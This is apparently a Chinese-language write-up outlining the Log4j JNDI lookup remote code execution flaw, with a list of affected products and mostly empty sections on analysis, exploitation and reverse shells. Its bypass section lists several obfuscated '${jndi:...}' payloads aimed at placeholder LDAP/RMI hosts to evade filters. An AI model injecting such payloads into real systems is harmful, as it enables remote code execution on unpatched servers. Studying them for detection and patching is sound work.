0x00 简介

0x01 范围

昨晚爆出的log4j rce 是通过lookup触发的漏洞，但jdk1.8.191以上默认不支持ldap协议，对于高版本jdk,则需要一定的依赖。不过为了给大家最简单的说明，我这里还是用jdk1.8.144的版本来运行。

• Apache Flink
• Apache Struts2
• flume
• dubbo
• Redis
• logstash
• ElasticSearch
• kafka
• ghidra
• Spring-Boot-strater-log4j2
• 我的世界（Minecraft）

  0x02 JNDI注入

  0x03 漏洞原理分析

  0x04 利用

  1、登录框处抓包
  
  2、burp log4j2插件扫描
  
  3、成功
  

  0x05 反弹shell

  0x05 绕过

  ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} ${jndi:rmi://adsasd.asdasd.asdasd} ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc} ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc} ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}